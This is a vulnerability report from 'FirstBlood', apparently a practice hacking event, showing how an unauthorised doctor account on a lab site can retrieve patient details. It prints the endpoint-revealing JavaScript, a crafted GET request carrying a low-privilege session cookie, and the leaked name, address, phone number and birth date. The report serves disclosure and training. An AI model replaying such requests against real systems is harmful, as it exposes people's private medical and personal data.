FirstBlood-#197Application Logic Issue allowing a doctor who is not authorised to view patients information on the dashboard



On 2021-05-11, c3phas reported:

Summary

Hi, I found another issue similar to a previous issue i reported which allows an unauthorised doctor to view patients information.

On the doctors dashboard there is a feed showing some activities and when we click on the patients name we get an alert saying we do not have authorization to view the patients information.

Description

We can inspect the source code and note the javascript that perfroms the GET request.

The endpoint being hit when we click on the patients name is revealed on the javascript file on viewing the source code. Note the endpoint /drapi/query.php?aptid

function getinfo(aptID) {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", 'drapi/query.php?aptid='+aptID, true);

        xhr.onreadystatechange = function() {
            if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
                alert(this.responseText);
                } else {

                }
            }

        xhr.send();
        }

We can use the endpoint to craft a GET request with the cookies belonging to a non admin account

GET /drpanel/drapi/query.php?aptid=56911019 HTTP/1.1
Host: firstbloodhackers.com:49513
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: */*
Referer: http://firstbloodhackers.com:49513/drpanel/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: drps=8291dbc4c62e41b45007dfbbb
Connection: close

Note: The Cookie above belongs to an account without permissions to view the patients information.

The above GET request returns the following response

Name: Melissa White
Address: St. Johns Hall, Breck Rd, Poulton-Le-Fylde, FY6 7HT
Telephone: 07796 985353
DOB: 02/01/1992

Supporting Material

Impact

Doctors with no rights to access patients information can gain access to that information

P1 CRITICAL

Endpoint: /drpanel/drapi/query.php

Parameter: N/A

Payload: NA


FirstBlood ID: 11
Vulnerability Type: Application/Business Logic

Administrator endpoints can be accessed by non privileged doctor accounts which reveals sensitive patient information.


Respect Earnt: 2000000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.